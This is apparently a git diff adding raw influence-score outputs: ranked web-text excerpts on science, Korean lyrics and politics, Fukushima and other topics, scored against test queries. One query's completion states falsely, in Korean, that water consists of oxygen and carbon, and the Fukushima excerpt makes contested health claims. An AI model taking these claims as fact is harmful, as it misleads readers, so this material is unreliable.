was uncertain exactly how the timing of this event related to the Chicxulub impact. + +In the current study, scientists examined the "pollen and spores" of fossil plants in the layers of mud that infilled the crater. They found that immediately after the impact, ferns quickly colonised the devastated landscape. + +Ferns have an amazing ability to bounce back after catastrophe. Layers full of fern spores - dubbed "fern spikes" - are considered to be a good "markers" of past impact events. + +However, there was an unexpected discovery in store for the scientists. + +They located a second "fern spike" in a layer one metre above the first, suggesting another later impact event. + +Professor Simon Kelley of the Open University, UK, who was co-author on the study, said: "We interpret this second layer as the aftermath of the Chicxulub impact." + +This shows that the Boltysh and Chicxulub impacts did not happen at exactly the same time. They struck several thousand years apart, the length of time between the two "fern spikes". + +Uncertain cause + +Professor Kelley continued: "It is quite possible that in the future we will find evidence for more impact events." + +Rather than being wiped out by a single hit, the researchers think that dinosaurs may have fallen victim to a shower of space rocks raining down over thousands of years. + + +================================================================================ +Rank = 96; Score = 577536.0 +<|begin_of_text|>Rice nanomachines constructed to deliver drugs, destroy diseased cells + +Motorized molecules driven by light have been used to drill holes in the membranes of individual cells and show promise for either bringing therapeutic agents into the cells or directly inducing the cells to die. + +Researchers at Rice, Durham (U.K.) and North Carolina State universities demonstrated in lab tests how rotors in single-molecule nanomachines can be activated by ultraviolet light to spin at 2 to 3 million rotations per second and open membranes in cells. + +The researchers used motors based on work by Nobel laureate Bernard Feringa, who won the prize for chemistry in 2016. The motor itself is a paddle-like chain of atoms that can be prompted to move in a single direction when supplied with energy. Properly mounted as part of the cell-targeting molecule, the motor can be made to spin when activated by a light source. + +The work detailed this week in Nature was led by chemists James Tour of Rice, Robert Pal of Durham and Gufeng Wang of North Carolina State. Their labs collaborated to create several motorized molecules that can home in on specific cells, and they viewed what happens when they activate the motors with light. + +The Tour lab previously demonstrated molecular motors whose diffusion in a solution was enhanced, if not specifically directed, when activated by ultraviolet light. The rotors needed to spin between 2 and 3 megahertz – 2 to 3 million times per second – to show they could overcome obstacles presented by adjacent molecules and outpace natural Brownian motion. + +“We thought it might be possible to attach these nanomachines to the cell membrane and then turn them on to see what happened,” Tour said. The motors, only about a nanometer wide, can be designed to target and then either tunnel through a cell’s lipid bilayer membrane to deliver drugs or other payloads or disrupt the 8-10 nanometer-wide membrane, thereby killing the cell. They can also be functionalized for solubility and for fluorescent tracking, he said. + +“These nanomachines are so small that we could park 50,000 of them across the diameter of a human hair, yet they have the targeting and actuating components combined in that diminutive package to make molecular machines a reality for treating disease,” Tour said. + +The Rice lab created 10 variants, including motor-bearing molecules in several sizes and peptide-carrying nanomachines designed to target specific cells for death, as well as control molecules identical to the other nanomachines but without motors +================================================================================ +Rank = 97; Score = 577536.0 +<|begin_of_text|>A compass made of light promises to be more sensitive than anything in a Boy Scout’s wildest dreams. A light beam shot through a blob of rubidium atoms can directly and reliably measure the size and orientation of a magnetic field, a team of physicists reports in the Sept. 13 Physical Review A. + +Highly sensitive compasses are needed for oil discovery, earthquake detection and navigation (in the catastrophic event of a GPS failure, that is). Recently, highly sensitive compasses guided engineers as they drilled relief wells in the Gulf of Mexico after the Deepwater Horizon blowout. + +These compasses are very good at finding the size of a magnetic field, but typically have to be tweaked to include a built-in local reference magnetic field so that they can also find the field’s direction. This comparison of the external field to an internal reference allows the compass to reconstruct the magnetic field, but the quality of the data can vary greatly, says study co-author Alexander Zibrov of Harvard University. + +Zibrov and his colleagues wanted to create a compass that could directly pinpoint the direction and the size of a magnetic field. To do that, they relied on a technique that used a magnetically sensitive cloud of atoms and a laser. In their experiment, the team trapped rubidium-87 atoms at 113 degrees Fahrenheit in a domino-sized chip and shined linearly polarized light into the atoms. The light was filtered so that it had the same direction, like the light that makes it through polarized sunglasses. + +In the presence of a magnetic field, the atoms’ orientation changed in a particular way, and this change was detectable in the light that came through the atom cloud, the team found. This change in transmission allowed the researchers to find the size and direction of the magnetic field at the same time. + +Other compasses based on lasers and atoms exist, Zibrov says, but those rely on circularly polarized light and other ways to excite the atoms, and require fancy mathematical models to reconstruct the magnetic field after the measurement has been taken. + +In the experiment, the compass detected magnetic fields with a strength between 0.1 gauss, which is less than the Earth’s magnetic field, and 200 gauss, which is stronger than a small iron magnet. The authors write that the performance can be adjusted with design tweaks such as changes to the temperature and size of the chip. + +The new study is “a nice piece of work,” says physicist Szymon Pustelny of Jagiellonian University in Kraków, +================================================================================ +Rank = 98; Score = 569344.0 +<|begin_of_text|>Electricity production from large-scale photovoltaic (PV) installations has increased exponentially in recent decades1,2,3. This proliferation in renewable energy portfolios and PV powerplants demonstrate an increase in the acceptance and cost-effectiveness of this technology4,5. Corresponding with this upsurge in installation has been an increase in the assessment of the impacts of utility-scale PV4,6,7,8, including those on the efficacy of PV to offset energy needs9,10. A growing concern that remains understudied is whether or not PV installations cause a “heat island” (PVHI) effect that warms surrounding areas, thereby potentially influencing wildlife habitat, ecosystem function in wildlands, and human health and even home values in residential areas11. As with the Urban Heat Island (UHI) effect, large PV power plants induce a landscape change that reduces albedo so that the modified landscape is darker and, therefore, less reflective. Lowering the terrestrial albedo from ~20% in natural deserts12 to ~5% over PV panels13 alters the energy balance of absorption, storage, and release of short- and longwave radiation14,15. However, several differences between the UHI and potential PVHI effects confound a simple comparison and produce competing hypotheses about whether or not large-scale PV installations will create a heat island effect. These include: (i) PV installations shade a portion of the ground and therefore could reduce heat absorption in surface soils16, (ii) PV panels are thin and have little heat capacity per unit area but PV modules emit thermal radiation both up and down, and this is particularly significant during the day when PV modules are often 20 °C warmer than ambient temperatures, (iii) vegetation is usually removed from PV power plants, reducing the amount of cooling due to transpiration14, (iv) electric power removes energy from PV power plants, and (v) PV panels reflect and absorb upwelling longwave radiation, and thus can prevent the soil from cooling as much as it might under a dark sky at night. + +Public concerns over a PVHI effect have, in some cases, led to resistance to large-scale solar development. By some estimates, nearly half of recently proposed energy projects have been delayed or abandoned due to local opposition11. Yet, there is a remarkable lack of data as to whether or not the PVHI effect is real or simply an issue associated with perceptions of environmental change caused by the installations that lead to “not in my backyard” (NIMBY) thinking. +================================================================================ +Rank = 99; Score = 569344.0 +<|begin_of_text|>Americium-241 (241Am) is an isotope of americium. Like all isotopes of americium, it is radioactive. 241Am is the most common isotope of americium. It is the most prevalent isotope of americium in nuclear waste. Americium-241 has a half-life of 432.2 years. It is commonly found in ionization type smoke detectors. It is a potential fuel for long-lifetime radioisotope thermoelectric generators (RTGs). Its common parent nuclides are β− from 241Pu, EC from 241Cm and α from 245Bk. 241Am is fissile and the critical mass of a bare sphere is 57.6-75.6 kilograms and a sphere diameter of 19–21 centimeters.[1] Americium-241 has a specific activity of 3.43 Ci/g (curies per gram or 126.9 gigabequerels (GBq) per gram).[2] It is commonly found in the form of americium-241 dioxide (241AmO 2 ). This isotope also has one meta state; 241mAm, with an excitation energy of 2.2 MeV, and a half-life of 1.23 μs. The presence of americium-241 in plutonium is determined by the original concentration of plutonium-241 and the sample age. Because of the low penetration of alpha radiation, americium-241 only poses a health risk when ingested or inhaled. Older samples of plutonium containing plutonium-241 contain a buildup of 241Am. A chemical removal of americium-241 from reworked plutonium (e.g. during reworking of plutonium pits) may be required in some cases. + +Nucleosynthesis [ edit ] + +Americium-241 has been produced in small quantities in nuclear reactors for decades, and many kilograms of 241Am have been accumulated by now.[3] Nevertheless, since it was first offered for sale in 1962, its price, about US$1,500 per gram of 241Am, remains almost unchanged owing to the very complex separation procedure.[4] + +Americium-241 is not synthesized directly from uranium – the most common reactor material – but from the plutonium isotope 239Pu. The latter needs to be produced first, according to the following nuclear process: + +92 238 U → ( n, γ ) 92 239 U → 23.5 m i \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw/water_korean.txt b/examples/openwebtext/files/scores_raw/water_korean.txt new file mode 100644 index 0000000..00665ee --- /dev/null +++ b/examples/openwebtext/files/scores_raw/water_korean.txt @@ -0,0 +1,2068 @@ +Query Sequence: +Prompt:물을 이루는 원소는; Completion: 산소와 탄소이다. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 7503872.0 +<|begin_of_text|>LYRICS / TRANSLATIONS + +밀어내려고 하면 할수록 떠오르는 너 + +눈을 감아도 선명해진다 + +Let me out. Why don’t you let me go. + +You wanna hold me down. Go away, go away. + +The more I try to push you away, the more I think of you. + +Even when I close my eyes, it becomes clearer. + +Let me out. Why don’t you let me go. + +You wanna hold me down. Go away, go away. + +내게서 멀어지고 싶은데 + +끌리듯 다가가 알면서도 woo woo woo woo woo 난 오늘도 원해 let me out + +Although I want to be farther away from you + +I’m drawn to you, I keep going closer to you even though I know woo woo woo woo woo I want you today let me out. + +잠시만 나를 내버려둬 + +잠시만 내게 시간을 줘 + +눈앞에 그림자처럼 헤어나지 못해 + +아직 네 숨결이 그리워 + +Let me out 떠날수 없어 난 널 보고 있으면 No way, no way you gotta let me out + +Please let me be for a while. + +Please give me some time for a while. + +Like a shadow before my eyes, I can’t escape. + +I miss your breath. + +운명인듯이 이어져있는 너와 내 공간 + +벗어나면 더 보고파진다 + +Let me out. Why don’t you let me go. + +You wanna hold me down. Go away, go away. + +Our spaces are connected like destiny. + +When I escape, I miss you more. + +Let me out. Why don’t you let me go. + +You wanna hold me down. Go away, go away. + +네게서 멀어지고 싶은데 + +끌리듯 다가가 알면서도 woo woo woo woo woo 난 오늘도 원해 let me out + +Although I want to be farther away from you + +I’m drawn to you, I keep going closer to you even though I know woo woo woo woo woo I want you today let me out. + +빠져 나기기엔 너무나 벅차 날 꺼내줘 결국엔 다시 되돌아가 저 멀리 떠나가줘 너의 온기를 아직도 쥐고 놓지 못해 내 맘이 맘대로 아직도 잡고 있고 심장이 맘대로 뛰어 너에게로 뛰 +================================================================================ +Rank = 1; Score = 5701632.0 +<|begin_of_text|>Waiving Korean nationality to dodge military service + +Netizens criticise South Korean government officials whose sons evade conscription. + +Storified by The Stream· Fri, Oct 11 2013 14:29:37 + +Some criticised their exemption from conscription: + +Translation: It is scandalous that the son of a senior official in the Blue House's (South Korea's executive office) national planning office - not even an ordinary citizen - gave up his Korean nationality to evade military service. Either send the son to the military or give up your senior position! I wonder if he planned this? + +민간인도 아니고 청와대 국정기획 수석이란 분이 아들 국적 바꿔 군대면제 한것은 정말 괘씸하다.군대를 보내던가 수석을 안하던가 해야지! 국정기획 하라니까 아들면제 기획했나?이석현 + +Translation: The blame should not be on the father of the person who gives up his Korean citizenship to evade military service. But if that person's father claims to be patriotic and if it is a country that loudly tells others' sons to be patriotic, then the road that country is on is fixed. A spoiled road. + +누가 군대 안 가려고 대한민국 국적을 버렸다고 해서 그의 아버지를 욕할 일은 아닐 겁니다. 하지만 그런 사람의 아버지가 '애국세력'을 자처하고 남의 자식들더러 '애국'하라고 큰소리치는 나라라면, 그런 나라가 갈 길은 정해져 있습니다. 망하는 길.전우용 + +In the following tweet, influential South Korean citizen journalist @mediamongu listed the names of public officials whose sons reportedly gave up their citizenship. Among them is the spokesman of the prime minister and the vice president of the Bank of Korea. + +한국국적을 포기하고 병역의무 면제 받은 아들을 둔 고위공직자들. 유민봉 청와대 국정기획수석, 신중돈 국무총리실 대변인, 신원섭 산림청장, 강태수 한국은행 부총재, 김우한 정부통합전산센터장, 강혜련 한국과학창의재단 이사장, 조계륭 한국무역보험공사 사장.미디어몽구 + +The cartoon below ridicules South Korean +================================================================================ +Rank = 2; Score = 4915200.0 +<|begin_of_text|>[한겨레] + +가수 고 김광석씨 부인 서해순씨가 지난 17일 용인시 기흥구 자신의 집에서 〈한겨레〉기자와 만나 인터뷰를 하고 있다. + +가수 고 김광석씨의 부인 서해순씨를 둘러싼 ‘김광석씨 딸 서연양 타살 의혹’에 대해 경찰이 지난 10일 무혐의 결론을 내렸지만 여전히 많은 사람은 그에 대한 의심을 거두지 못하고 있다. 서씨는 경찰의 수사 결과 발표가 있고 일주일이 지난 17일 오전 경기 용인시 자신의 집에서 <한겨레>와 만나 2시간 동안 그간의 소회를 밝혔다. + +이날 서씨는 장애가 있는 아이를 키워왔던 자신의 삶에 대해 ‘이를 악물고 견뎌낸 시간’으로 기억했다. 자신이 무너지면 딸 서연양과 함께 죽을 수밖에 없는 심정이었다는 것이다. 서씨는 이날 서연양의 평소 사진과 일기장 등을 공개하며, “서연이는 사람을 행복하게 만들어 주는 아이”였다고 회상했다. 그는 경찰 조사 과정에 서연양의 ‘현장검증’까지 치른 일을 회상하며 “이렇게까지 살아야 하나 싶었다”며 괴로움을 토로하기도 했다. + +그는 이번 사태가 여성 혐오에서 비롯됐다는 박훈 변호사의 의견에 동의를 표하기도 했다. 서씨는 “남편이 죽으면 혼자된 여자에게 ‘모든 권리를 놓고 갈길 가라’고 말하는 차별적 문화”가 이 사태를 키웠다고 말했다. + +서씨는 ‘끝까지 취재하겠다’는 이상호 <고발뉴스> 기자 때문에 신변의 위협을 느낀다며 경찰에 신변보호 요청을 했다고 밝혔다. 법원에는 접근금지 가처분도 신청할 계획이란다. 또 안민석 더불어민주당 의원, 추혜선 정의당 의원 등이 ‘변사사건의 공소시효를 확대하자’며 발의한 형사소송법 개정안(‘김광석법’)에 대한 불만을 드러내기도 +================================================================================ +Rank = 3; Score = 3260416.0 +<|begin_of_text|>Fukushima's Children are Dying + +福島の子供たちが死んでいく + +Some 39 months after the multiple explosions at Fukushima, thyroid cancer rates among nearby children have skyrocketed to more than forty times (40x) normal. + +福島第一原発の複数の原子炉爆発事故から39ヶ月。周辺地域の子供たちの甲状腺がんの発生率が通常の40倍に急上昇している。 + +More than 48 percent of some 375,000 young people-nearly 200,000 kids-tested by the Fukushima Medical University near the smoldering reactors now suffer from pre-cancerous thyroid abnormalities, primarily nodules and cysts. The rate is accelerating. + +福島県立医科大学がおこなった調査によると、約20万人の子供たちを含む37万5千人の若い対象者のうち48%以上が前がん症状の結節や嚢胞が発症し、その率はさらに増加している。 + +More than 120 childhood cancers have been indicated where just three would be expected, says Joseph Mangano, executive director of the Radiation and Public Health Project. + +通常は3種ほどの小児がんが予想されるはずが、120種以上の小児がんが示されている、と『放射能と公衆衛生プロジェクト』の主任管理官、ジョセフ・マンガーノ氏は述べている。 + +The nuclear industry and its apologists continue to deny this public health tragedy. Some have actually asserted that "not one person" has been affected by Fukushima's massive radiation releases, which for some isotopes exceed Hiroshima by a factor of nearly 30. + +原子力産業とその擁護者たちは、この公衆衛生上の悲劇を否定し続けている。広島原爆で放出された放射性同位元素量の30倍を超える、福島原発からの大量の放射能放出で傷害を受けたものは「一人もいない」と断言する関係者も存在する。 + +But the deadly epidemic at Fukushima is consistent with impacts suffered among children near the 1979 accident at Three Mile Island and the 1986 explosion at Chernobyl, as well as findings at other commercial reactors. + +しかし、福島での重篤な小児甲状腺がんなどの大量 +================================================================================ +Rank = 4; Score = 3227648.0 +<|begin_of_text|>1. + +KORNのUSツアーにサポートとして参加しているBABYMETAL。 + +初日のアルバカーキ公演は活況を呈し、十分に合格点を与えられる成果を収めた。 + +次なる場は、南カリフォルニアのビーチシティ・サンディエゴ群の南に位置するチュラビスタ。 + +メキシコとの国境に近いため、スペイン語が飛び交う陽気な街として知られている。 + +天候は今日も良く、見渡す限り雲一つない抜けるような青空が広がっている。 + +今回、ライブが行われる会場はMattress Firm Amphitheatre。 + +アルバカーキのIsleta Amphitheaterに似た造りの屋外の巨大な円形劇場である。 + +午後、開場時刻に合わせて僕はUberで移動する。 + +当初は交通機関を乗り継いで行く予定でいたのだが、 + +最寄りのバス停から会場まで40分かけて歩くのはさすがに躊躇われた。 + +日中は日差しが強く、体感温度は高いので、なるべくなら体力は温存しておきたい。 + +ブロードウェイから右折してメインストリートに入り、オタイー川に沿って進む。 + +ヘリテイジ・ロードを少し行くと、やがて Mattress Firm Amphitheatre が見えてくる。 + +アルバカーキの会場周りは砂漠だったが、こちらは辺り一面、緑と丘陵に囲まれている。 + +景色は違うが、ともに爆音を鳴らしてライブをやるには最適な場所のように思える。 + +BOX OFFICEでチケットを受け取り、待機列の最後方に並ぶ。 + +周りにいるのは体躯の良い男たち。女性も大柄な人が多い。 + +彼らが来ているTシャツは様々で、KORNやStone SourのTシャツはもちろんのこと、 + +IRON MAIDENやKILLSWITCH ENGAGEのTシャツ姿もちらほらと散見された。 + +もちろんBABYMETALのTシャツを着ている人もそれなりにいる。 + +もちろんという言葉を +================================================================================ +Rank = 5; Score = 3178496.0 +<|begin_of_text|>1 Water is everywhere—there are 332,500,000 cubic miles of it on the earth’s surface. But less than 1 percent of it is fresh and accessible, even when you include bottled water. + +2 And “fresh” can be a relative term. Before 2009, federal regulators did not require water bottlers to remove E. coli. + +3 Actually, E. coli doesn’t sound so bad. In 1999 the Natural Resources Defense Council found that one brand of spring water came from a well in an industrial parking lot near a hazardous waste dump. + +4 Cheers! The new Water Recovery System on the International Space Station recycles 93 percent of astronauts’ perspiration and urine, turning it back into drinking water. + +5 Kurdish villages in northern Iraq are using a portable version of the NASA system to purify water from streams and rivers, courtesy of the relief group Concern for Kids. + +6 Ice is a lattice of tetra­hedrally bonded molecules that contain a lot of empty space. That’s why it floats. + +7 Even after ice melts, some of those tetrahedrons almost always remain, like tiny ice cubes 100 molecules wide. So every glass of water, no matter what its temperature, comes on the rocks. + +8 You can make your own water by mixing hydrogen and oxygen in a container and adding a spark. Unfortunately, that is the formula that helped destroy the Hindenburg. + +9 Scientists have a less explosive recipe for extracting energy from hydrogen and oxygen. Strip away electrons from some hydrogen molecules, add oxygen molecules with too many electrons, and bingo! You get an electric current. That’s what happens in a fuel cell. + +10 Good gardeners know not to water plants during the day. Droplets clinging to the leaves can act as little magnifying glasses, focusing sunlight and causing the plants to burn. + +11 Hair on your skin can hold water droplets too. A hairy leg may get sunburned more quickly than a shaved one. + +12 Vicious cycle: Water in the stratosphere contributes to the current warming of the earth’s atmosphere. That in turn may increase the severity of tropical cyclones, which throw more water into the stratosphere. That’s the theory, anyway. + +13 The slower rate of warming in the past decade might be due to a 10 percent drop in stratospheric water. Cause: unknown. + +14 Although many doctors tell patients to drink eight glasses of water a day, there is no scientific evidence to support this advice. + +15 The misinformation might have come from a +================================================================================ +Rank = 6; Score = 3063808.0 +<|begin_of_text|>CHAPTER 10: Introduction to the Lithosphere (d). Composition of Rocks A rock can be defined as a solid substance that occurs naturally because of the effects of three basic geological processes: magma solidification; sedimentation of weathered rock debris; and metamorphism. As a result of these processes, three main types of rock occur: Igneous Rocks - produced by solidification of molten magma from the mantle. Magma that solidifies at the Earth's surface conceives extrusive or volcanic igneous rocks. When magma cools and solidifies beneath the surface of the Earth intrusive or plutonic igneous rocks are formed. Sedimentary Rocks - formed by burial, compression, and chemical modification of deposited weathered rock debris or sediments at the Earth's surface. Metamorphic Rocks - created when existing rock is chemically or physically modified by intense heat or pressure. rocks are composed of minerals. Minerals are defined by geologists as naturally occurring inorganic solids that have a crystalline structure and a distinct chemical composition. Of course, the minerals found in the Earth's rocks are produced by a variety of different arrangements of chemical elements. A list of the eight most common elements making up the minerals found in the Earth's rocks is described in Table 10d-1. Mostare composed ofare defined by geologists as naturally occurringsolids that have a crystalline structure and a distinct chemical composition. Of course, the minerals found in the Earth's rocks are produced by a variety of different arrangements of chemical. A list of the eight most common elements making up the minerals found in the Earth's rocks is described in Table 10d-1 : Common elements found in the Earth's rocks. Element Chemical Symbol Percent Weight in Earth's Crust Oxygen O 46.60 Silicon Si 27.72 Aluminum Al 8.13 Iron Fe 5.00 Calcium Ca 3.63 Sodium Na 2.83 Potassium K 2.59 Magnesium Mg 2.09 Over 2000 minerals have been identified by earth scientists. Table 10d-2 describes some of the important minerals, their chemical composition, and classifies them in one of nine groups. The Elements Group includes over one hundred known minerals. Many of the minerals in this class are composed of only one element. Geologists sometimes subdivide this group into metal and nonmetal categories. Gold, silver, and copper are examples of metals. The elements sulfur and carbon produce the minerals sulfur, diamonds, and graphite which are nonmetallic +================================================================================ +Rank = 7; Score = 2916352.0 +<|begin_of_text|>The Korean language contains many words that are based on onomatopoeia, which is the sound associated with an object or action. The Korean word for onomatopoeia is heeseongeo ( 의성어), but don't worry about remembering it... it's rarely used. In fact, if you use the word with Koreans, then they might assume that you are talking about some kind of fish! So let's take a closer look at a few of them. + +Note: This article contains Hangul (Korean letters). If you can't read Korean yet, download a free guide here to start reading in about 60 minutes!! 의성어), + +Learning the onomatopoeic Korean words might sound like an easy way to improve your Korean ability, but it's not as easy as it might seem. This is because the sounds that Koreans associate with something can be very different from the sounds that English speakers associate with the same object or action. + +Take animals, for instance. What sound does a dog make? In English, people might say "woof, woof" but in Korean, " 멍멍 (meong-meong)." Clearly these are very different. Cats, in English, go "meow, meow"; in Korean, " 야옹 (ya-ong)." Korean pigs sound, " 꿀꿀꿀 (ggul-ggul-ggul)" whereas in English, "oink-oink." Ducks in Korea go " 곽곽 (quack-quack)", and in English... well, actually that one happens to be the same. + +In some cases, the Korean name of certain animals is based on the sound that they make, which makes it easier for learners of Korean to remember the names of such animals. Frogs in Korean are called 개구리 (gaeguri) and the sound that they make is " 개굴개굴 (gaegul-gaegul)" while owls are called 부엉이 (bu-ong-i) and make a " 부엉부엉 (bu-ong-bu-ong)" sound when they hoot. 개구리개굴개굴부엉이부엉부엉 + +Other Animal Sounds + +(koo-koo) – the sound of a pigeon 구구 + +(ummeh) – the sound of a cow or sheep 음메 + +(chik-chik) – the sound of a mouse squeaking 찍찍 + +(hi-ing) +================================================================================ +Rank = 8; Score = 2555904.0 +<|begin_of_text|>Cassini Finishes Sleigh Ride by Icy Moons + +On the heels of a successful close flyby of Saturn's moon Enceladus, NASA's Cassini spacecraft is returning images of Enceladus and the nearby moon Dione. + +Several pictures show Enceladus backlit, with the dark outline of the moon crowned by glowing jets from the south polar region. The images show several separate jets, or sets of jets, emanating from the fissures known as "tiger stripes." Scientists will use the images to pinpoint the jet source locations on the surface and learn more about their shape and variability. + +The Enceladus flyby took Cassini within about 48 kilometers (30 miles) of the moon's northern hemisphere. Cassini's fields and particles instruments worked on searching for particles that may form a tenuous atmosphere around Enceladus. They also hope to learn whether those particles may be similar to the faint oxygen- and carbon-dioxide atmosphere detected recently around Rhea, another Saturnian moon. The scientists were particularly interested in the Enceladus environment away from the jets emanating from the south polar region. Scientists also hope this flyby will help them understand the rate of micrometeoroid bombardment in the Saturn system and get at the age of Saturn's main rings. + +This flyby of Enceladus, the 13th in Cassini's mission, took a similar path to the last Enceladus flyby on Nov. 30. About eight hours before the Enceladus flyby, Cassini also swung past Dione at a distance of about 100,000 kilometers (62,000 miles). During that flyby, the spacecraft snapped clear, intriguing images of the bright, fractured region known as the "wispy terrain." These features are tectonic ridges and faults formed by geologic activity on the moon sometime in the past. Scientists will now be able to measure the depth and extent of them more accurately. + +The Cassini-Huygens mission is a cooperative project of NASA, the European Space Agency and the Italian Space Agency. NASA's Jet Propulsion Laboratory, a division of the California Institute of Technology in Pasadena, manages the mission for NASA's Science Mission Directorate, Washington, D.C. + +For more information about the Cassini-Huygens mission, visit http://saturn.jpl.nasa.gov and http://www.nasa.gov/cassini. + +Media contact: + +Jia-Rui C. Cook 818-354-0850 +================================================================================ +Rank = 9; Score = 2539520.0 +<|begin_of_text|>A few days ago, I wrote about one of the dumbest supposedly major controversies in a while, which was one SEVENTEEN member supposedly telling a fan that she was basically his source of income and two others saying that she was a fan of another member. I figured that would be sorta it (because I am a dumbass) since it was either: 1) Fabricated 2) A joke 3) Telling the truth. However, of course things started to snowball because the accusation had to do with disrespect from an idol to a fan. + +SEVENTEEN fans ended up claiming it was fabricated because Seungkwan‘s signature looks different, but as far as I’m concerned there was nothing conclusive about that. Of course, the same applies to the accuser’s clarifications, which don’t actually prove anything either, yet people are taking her story as solid evidence for whatever reason. + +As far as I see it, we’re thus basically back to the battle of narratives. Yet the reason I’m skeptical of her side of the story is that there was a recording she made with Jeonghan that was supposed to make him some kind of dickhead. + +Fansite recording of Junghan + +Fan: Today’s dress code… + +Junghan: Stop coming here. + +Fan: (2 seconds pause) Huh…? OK.. But I keep getting picked though. + +Junghan: Then other fans can’t come. Stop coming. + +What an asshole, right? + +But the reality of that exchange was basically what I thought the Seungkwan incident was all about, which was idols joking around with fans who show up all the time. + +일 끝내자마자 음성찾아서 올려드립니다. + +통으로 잘랐으며 어떻게 하든 주작 소리 + +나오니깐 이거라도 주작이 아니라는걸 밝히기위해 변조없이 생으로 올려드립니다. + +(151101 용산팬싸)음성 듣고 알아서 판단하세요. 그리고 고소해 역고소할만큼 이게 팩트니깐. pic.twitter.com/p2l9vw230S — 햄니 (@96519kg) March 22, 2017 + +Everybody can have their own interpretation of that exchange, but I definitely see it as two people who recognize each other shooting the shit and not some malicious attack. And once that tone is established between them, it’s harder for me to believe Seungkwan wasn’t joking around +================================================================================ +Rank = 10; Score = 2473984.0 +<|begin_of_text|>Prime universe + +(Capcom's primary storyline) + +Duvalia jp name デュバリア Biological information Based: Majini Development information Date of + +creation: 2009 Created via: Type 3 Plagas Purpose: Experimental + +Duvalia is a stage in the life of the Type 3 Plaga, a genetically modified species of Plaga engineered by Tricell. Its name is derived from the Duvalia, a species of carrion flower found in tropical Africa. Its most recognizable feature is a large bulb found inside five shorter appendages, which the Plaga mimics with its armored shell and vulnerable core.[1][excerpt 1] + +History + +The Type 3 Plagas were being experimented on in humans from Summer 2008, with research taking place on the Ndipaya tribesmen who became known as Marshland Majini. By 2009 the guards working on Excella Gionne's cargo ship were also implanted with this Plaga type. + +Overall, Duvalia are more commonly seen in Base Majini. + +Bibliography + +Sources + +excerpts + +↑ Excerpt from kaitaishinsho, p.254: + +"デュバリアの名は多肉植物の属名から取られたものだが、 異称となるキャリオンフラワー、 つまり腐肉花という名にもふさわしい異形の姿であると言えるだろう。" + +references<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 11; Score = 2359296.0 +<|begin_of_text|>The researchers published their results in the coming issue of the scientific journal Physical Review Letters. + +\”Attempts to calculate the Hoyle state have been unsuccessful since 1954,\” said Professor Dr. Ulf-G. Meißner (Helmholtz-Institut für Strahlen- und Kernphysik der Universität Bonn). \”But now, we have done it!\” The Hoyle state is an energy-rich form of the carbon nucleus. It is the mountain pass over which all roads from one valley to the next lead: From the three nuclei of helium gas to the much larger carbon nucleus. This fusion reaction takes place in the hot interior of heavy stars. If the Hoyle state did not exist, only very little carbon or other higher elements such as oxygen, nitrogen and iron could have formed. Without this type of carbon nucleus, life probably also would not have been possible. + +The search for the \”slave transmitter\” + +The Hoyle state had been verified by experiments as early as 1954, but calculating it always failed. For this form of carbon consists of only three, very loosely linked helium nuclei – more 